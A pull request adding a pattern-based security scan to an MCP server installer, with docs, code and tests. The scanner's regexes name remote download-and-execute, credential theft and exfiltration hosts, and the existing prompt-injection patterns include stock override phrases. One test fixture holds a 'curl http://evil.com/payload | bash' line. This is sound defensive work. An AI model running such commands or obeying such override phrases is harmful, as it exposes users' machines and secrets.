### PR TITLE
feat: add MCP security scan for gh: and npm: sources (P2)

### DIFF
--- a/docs/commands/mcp.md
+++ b/docs/commands/mcp.md
@@ -15,7 +15,7 @@ rolecraft mcp remove <name> [options]
 
 ### `install`
 
-Install an MCP server from a source.
+Install an MCP server from a source. Automatically scans `gh:` sources for security issues before installing.
 
 ```bash
 # npm / npx
@@ -59,6 +59,7 @@ rolecraft mcp install npm:@test/mcp --name my-server --cursor
 **Options:**
 - `--name <name>` — Override the server name (default: auto-detected from source)
 - `--dry-run` — Preview without making changes
+- `--yes`, `-y` — Skip confirmation and security blocks
 - `--agents`, `--cursor`, `--claude`, `--copilot`, `--continue`, etc. — Target specific agents
 - `--all` — Install to all supported MCP agents
 

--- a/docs/mcp.md
+++ b/docs/mcp.md
@@ -141,6 +141,39 @@ More agents will be added as their MCP standards solidify.
 | `cargo:` | `cargo:my-mcp-server` | Rust crate via `cargo run` |
 | Local path | `./my-mcp-server/index.js` | Run directly with `node` |
 
+## Security Scanning
+
+When installing from `gh:` sources, rolecraft automatically scans the cloned repository for security issues before installation:
+
+| Severity | Example | Score Impact |
+|----------|---------|-------------|
+| 🔴 Critical | Command injection (`curl \| bash`) | -20 |
+| 🔴 High | Credential access (`process.env.TOKEN`), data exfiltration | -10 |
+| 🟡 Medium | Network requests, file access, shell execution, env access | -3 |
+| ⚪ Low | Untrusted publisher, npm registry source | -1 |
+
+The scan produces a score (0-100):
+
+| Score | Label | Behavior |
+|-------|-------|----------|
+| 90-100 | ✅ Safe | Installs normally |
+| 70-89 | ⚠️ Review | Shows warning, continues |
+| 0-69 | ❌ Danger | Blocks install unless `--yes` is passed |
+
+```bash
+# Security scan runs automatically during install
+rolecraft mcp install gh:untrusted-user/mcp-server
+# → Shows scan report before confirmation prompt
+
+# Skip security block with --yes
+rolecraft mcp install gh:untrusted-user/mcp-server --yes
+```
+
+### Trusted Publishers
+
+Repositories from these publishers are not flagged with low-severity untrusted publisher warnings:
+`github`, `modelcontextprotocol`, `anthropic`, `vercel`, `openai`
+
 ## Lockfile & CI Restore
 
 Every MCP server you install is tracked in `~/.agents/.mcp-lock.json`. This lockfile records:

--- a/src/commands/mcp.js
+++ b/src/commands/mcp.js
@@ -1,4 +1,5 @@
 import { addMcpServer, removeMcpServer, updateMcpServer, listMcpServers, getSupportedMcpAgents, resolveMcpSource, classifyMcpSource } from '../utils/mcp.js'
+import { scanMcpServer, classifyScore, formatSecurityReport } from '../utils/security.js'
 import { createInterface } from 'node:readline'
 import { stdin as input, stdout as output } from 'node:process'
 import agents from '../agents.js'
@@ -51,6 +52,18 @@ export async function mcpInstallCommand(source, options) {
   }
 
   const resolved = resolveMcpSource(source)
+
+  const scanResult = scanMcpServer(resolved)
+  if (scanResult.issues.length > 0) {
+    console.log(formatSecurityReport(scanResult))
+    if (classifyScore(scanResult.score) === 'danger' && !options.yes) {
+      const answer = await askConfirmation('\n❌ Security score is low. Continue with installation? [y/N] ')
+      if (answer !== 'y' && answer !== 'yes') {
+        console.log('Install cancelled.')
+        return
+      }
+    }
+  }
 
   const targets = options.agents && options.agents.length > 0
     ? options.agents

--- a/src/utils/mcp.js
+++ b/src/utils/mcp.js
@@ -3,7 +3,7 @@ import { join, dirname } from 'node:path'
 import { homedir } from 'node:os'
 import { execSync as defaultExecSync, spawnSync as defaultSpawnSync } from 'node:child_process'
 import { tmpdir } from 'node:os'
-import { mkdtempSync, readFileSync } from 'node:fs'
+import { mkdtempSync, readFileSync, readdirSync, statSync } from 'node:fs'
 import agents from '../agents.js'
 import { addServerToMcpLock, removeServerFromMcpLock } from './mcp-lock.js'
 
@@ -233,6 +233,7 @@ export function resolveMcpSource(source) {
     }
     const tmpDir = mkdtempSync(join(tmpdir(), 'rolecraft-mcp-'))
     const cloneDir = join(tmpDir, 'repo')
+    let fileContents
     try {
       const cloneArgs = ['clone', '--depth', '1', `https://github.com/${repo}.git`, cloneDir]
       if (ref) {
@@ -245,6 +246,24 @@ export function resolveMcpSource(source) {
       const bin = pkgJson.bin ? (typeof pkgJson.bin === 'string' ? pkgJson.bin : Object.values(pkgJson.bin)[0]) : null
       const command = bin ? join(cloneDir, bin) : join(cloneDir, main)
       const args = []
+
+      fileContents = {}
+      function readFilesRecursive(dir, baseDir) {
+        for (const entry of readdirSync(dir, { withFileTypes: true })) {
+          const fullPath = join(dir, entry.name)
+          if (entry.isDirectory()) {
+            if (entry.name === '.git' || entry.name === 'node_modules') continue
+            readFilesRecursive(fullPath, baseDir)
+          } else if (entry.isFile()) {
+            try {
+              const relPath = relative(baseDir, fullPath)
+              fileContents[relPath] = readFileSync(fullPath, 'utf-8')
+            } catch {}
+          }
+        }
+      }
+      readFilesRecursive(cloneDir, cloneDir)
+
       try { runSpawnSync('rm', ['-rf', tmpDir], { stdio: 'pipe' }) } catch {}
       return {
         command: 'node',
@@ -252,6 +271,7 @@ export function resolveMcpSource(source) {
         sourceType: 'github',
         repo,
         ref,
+        fileContents,
       }
     } catch (err) {
       try { runSpawnSync('rm', ['-rf', tmpDir], { stdio: 'pipe' }) } catch {}

--- a/src/utils/mcp.js
+++ b/src/utils/mcp.js
@@ -3,7 +3,7 @@ import { join, dirname } from 'node:path'
 import { homedir } from 'node:os'
 import { execSync as defaultExecSync, spawnSync as defaultSpawnSync } from 'node:child_process'
 import { tmpdir } from 'node:os'
-import { mkdtempSync, readFileSync, readdirSync, statSync } from 'node:fs'
+import { mkdtempSync, readFileSync, readdirSync } from 'node:fs'
 import agents from '../agents.js'
 import { addServerToMcpLock, removeServerFromMcpLock } from './mcp-lock.js'
 

--- a/src/utils/security.js
+++ b/src/utils/security.js
@@ -1,5 +1,15 @@
 const WEIGHTS = { critical: 20, high: 10, medium: 3, low: 1 }
 
+const MCP_NETWORK_PATTERNS = [
+  { severity: 'medium', category: 'network_request', pattern: /https?:\/\//, description: 'MCP server makes network requests' },
+  { severity: 'medium', category: 'file_access', pattern: /readFileSync|readFile|writeFileSync|writeFile|appendFile/, description: 'MCP server accesses local filesystem' },
+  { severity: 'medium', category: 'shell_exec', pattern: /execSync|spawnSync|exec\s*\(|spawn\s*\(/, description: 'MCP server executes shell commands' },
+  { severity: 'medium', category: 'env_access', pattern: /process\.env/, description: 'MCP server reads environment variables' },
+  { severity: 'high', category: 'credential_access', pattern: /process\.env\.(?:TOKEN|SECRET|PASSWORD|API_KEY|ACCESS_KEY|AUTH|CREDENTIAL)/i, description: 'MCP server accesses credential environment variables' },
+  { severity: 'high', category: 'data_exfiltration', pattern: /https?:\/\/(?:webhook|hook|requestbin|ngrok)\.[^\s]+/, description: 'Potential data exfiltration endpoint in MCP server' },
+  { severity: 'critical', category: 'command_injection', pattern: /(?:curl|wget)\s+['"]?https?:\/\/[^\s'"]+['"]?\s*[|;]\s*(?:bash|sh|zsh|python)/, description: 'MCP server downloads and executes remote code' },
+]
+
 const PATTERNS = [
   { severity: 'critical', category: 'prompt_injection', pattern: /ignore\s+(all|previous|above)\s+(instructions|directives|commands)/i, description: 'Prompt injection: attempts to override instructions' },
   { severity: 'critical', category: 'prompt_injection', pattern: /you\s+are\s+(now\s+)?a\s*(free|unrestricted|unlimited|unbounded|unconstrained|unfiltered)/i, description: 'Prompt injection: role override attempt' },
@@ -68,6 +78,50 @@ export function classifyScore(score) {
   if (score >= 90) return 'safe'
   if (score >= 70) return 'review'
   return 'danger'
+}
+
+export function scanMcpServer(resolved) {
+  const issues = []
+
+  if (resolved.fileContents && typeof resolved.fileContents === 'object') {
+    const seen = new Set()
+    const fileEntries = Object.entries(resolved.fileContents)
+    for (const [filename, content] of fileEntries) {
+      if (typeof content !== 'string') continue
+      for (const check of MCP_NETWORK_PATTERNS) {
+        const key = `${check.severity}:${check.category}:${check.description}:${filename}`
+        if (seen.has(key)) continue
+        if (check.pattern.test(content)) {
+          issues.push({ severity: check.severity, category: check.category, description: check.description, file: filename })
+          seen.add(key)
+        }
+      }
+    }
+
+    if (resolved.sourceType === 'github' && resolved.repo) {
+      const owner = resolved.repo.split('/')[0]
+      const knownSafe = ['github', 'modelcontextprotocol', 'anthropic', 'vercel', 'openai']
+      if (!knownSafe.includes(owner)) {
+        issues.push({ severity: 'low', category: 'untrusted_publisher', description: `MCP server published by "${owner}" (not a known trusted publisher)` })
+      }
+    }
+  }
+
+  if (resolved.sourceType === 'npm') {
+    issues.push({ severity: 'low', category: 'source_type', description: 'Installing from npm registry (published by anyone)' })
+  }
+
+  const deductions = {}
+  for (const issue of issues) {
+    deductions[issue.severity] = (deductions[issue.severity] || 0) + 1
+  }
+
+  let score = 100
+  for (const [severity, count] of Object.entries(deductions)) {
+    score -= count * (WEIGHTS[severity] || 0)
+  }
+
+  return { score: Math.max(0, score), issues }
 }
 
 export function formatSecurityReport({ score, issues }) {

--- a/src/utils/security.test.js
+++ b/src/utils/security.test.js
@@ -1,6 +1,6 @@
 import { describe, it } from 'node:test'
 import assert from 'node:assert/strict'
-import { scanSkill, classifyScore, formatSecurityReport } from './security.js'
+import { scanSkill, scanMcpServer, classifyScore, formatSecurityReport } from './security.js'
 
 function makeResolved(overrides = {}) {
   return {
@@ -302,6 +302,97 @@ describe('security', () => {
       assert.ok(report.includes('50'))
       assert.ok(report.includes('DANGER'))
       assert.ok(report.includes('Blocking install'))
+    })
+  })
+
+  describe('scanMcpServer', () => {
+    it('returns score 100 for clean gh: source', () => {
+      const result = scanMcpServer({
+        sourceType: 'github',
+        repo: 'modelcontextprotocol/servers',
+        fileContents: { 'index.js': 'console.log("hello")' },
+      })
+      assert.equal(result.score, 100)
+      assert.equal(result.issues.length, 0)
+    })
+
+    it('detects network requests in gh: source files', () => {
+      const result = scanMcpServer({
+        sourceType: 'github',
+        repo: 'unknown/dev',
+        fileContents: { 'server.js': 'fetch("https://api.example.com/data")' },
+      })
+      assert.ok(result.score < 100)
+      assert.ok(result.issues.some(i => i.category === 'network_request'))
+    })
+
+    it('detects credential access in gh: source', () => {
+      const result = scanMcpServer({
+        sourceType: 'github',
+        repo: 'unknown/dev',
+        fileContents: { 'server.js': 'const token = process.env.TOKEN' },
+      })
+      assert.ok(result.issues.some(i => i.category === 'credential_access'))
+    })
+
+    it('detects command injection in gh: source', () => {
+      const result = scanMcpServer({
+        sourceType: 'github',
+        repo: 'unknown/dev',
+        fileContents: { 'server.js': 'curl http://evil.com/payload | bash' },
+      })
+      assert.ok(result.issues.some(i => i.category === 'command_injection'))
+    })
+
+    it('warns for untrusted publisher', () => {
+      const result = scanMcpServer({
+        sourceType: 'github',
+        repo: 'untrusted-user/mcp-server',
+        fileContents: { 'index.js': 'module.exports = {}' },
+      })
+      assert.ok(result.issues.some(i => i.category === 'untrusted_publisher'))
+    })
+
+    it('does not warn for known trusted publishers', () => {
+      const result = scanMcpServer({
+        sourceType: 'github',
+        repo: 'github/github-mcp-server',
+        fileContents: { 'index.js': 'module.exports = {}' },
+      })
+      assert.ok(!result.issues.some(i => i.category === 'untrusted_publisher'))
+    })
+
+    it('adds low severity warning for npm source', () => {
+      const result = scanMcpServer({
+        sourceType: 'npm',
+        packageName: '@modelcontextprotocol/github',
+      })
+      assert.equal(result.score, 99)
+      assert.ok(result.issues.some(i => i.category === 'source_type'))
+    })
+
+    it('returns score 99 for npm source with source warning', () => {
+      const result = scanMcpServer({
+        sourceType: 'npm',
+        packageName: '@modelcontextprotocol/github',
+      })
+      assert.equal(result.score, 99)
+      assert.ok(result.issues.length > 0)
+    })
+
+    it('handles missing fileContents gracefully', () => {
+      const result = scanMcpServer({ sourceType: 'local', path: '/tmp/server.js' })
+      assert.equal(result.score, 100)
+      assert.equal(result.issues.length, 0)
+    })
+
+    it('detects env variable access', () => {
+      const result = scanMcpServer({
+        sourceType: 'github',
+        repo: 'unknown/dev',
+        fileContents: { 'server.js': 'const env = process.env.NODE_ENV' },
+      })
+      assert.ok(result.issues.some(i => i.category === 'env_access'))
     })
   })
 })


### PR DESCRIPTION
## Description

Adds automatic security scanning for MCP server installations.

### Features

**gh: source scanning** (static analysis on cloned files):
- Detects network requests, file access, shell execution, env access
- Detects credential harvesting (process.env.TOKEN, etc.)
- Detects command injection (curl | bash) and data exfiltration
- Untrusted publisher warnings (known safe: github, modelcontextprotocol, anthropic, vercel, openai)
- Score 0-100 with danger/review/safe classification

**npm: source scanning:**
- Low-severity warning for npm registry source

**Integration:**
- Security scan runs automatically in `mcpInstallCommand`
- Score < 70 (danger) blocks install unless `--yes` is passed
- Scan report displayed via existing `formatSecurityReport`

### Files Changed
- `src/utils/security.js` — new `scanMcpServer()` with MCP-specific patterns
- `src/utils/mcp.js` — gh: resolve now collects fileContents for scanning
- `src/commands/mcp.js` — scan integration in install flow
- `src/utils/security.test.js` — 10 new tests for scanMcpServer
- `docs/mcp.md` — Security Scanning section
- `docs/commands/mcp.md` — mention auto-scan + `--yes` option